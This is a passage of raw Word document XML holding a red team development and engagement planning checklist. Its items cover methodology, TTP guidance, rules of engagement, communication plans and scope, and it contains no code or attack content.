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27565A" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RED TEAM CHECKLIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253B1D8" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00BB134D" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RED TEAM DEVELOPMENT CHECKLIST</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="red-team-development-checklist" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FDA84B5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Determine required knowledge and skills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21FA68" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Identify and implement alternate methods for bridging knowledge gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B903BC6" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop roles and responsibilities guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47520C85" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop red team methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7323E" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop TTP guidance for engagements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F4BE3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Includes Bag of tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF3BB9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop data collection guide and tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C031680" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop operational process plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8314BA" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop communication plan template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEF085" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop ROE template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E0D0F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop technical briefing template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7E41E" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop report template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2753C7" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PLANNING - RED TEAM ENGAGEMENT CHECKLIST</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="planning---red-team-engagement-checklist" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21C5BCF5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Engagement Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EEB74E" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ROE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAFCF0" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Event Communication plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C62F3F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Distribute Deconfliction Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F563C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Entry point/method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C072C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C18D9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Goals/Objectives (should address at least one of the following)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64320BF4" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Protect</w:t>
      </w:r>
    </w:p>
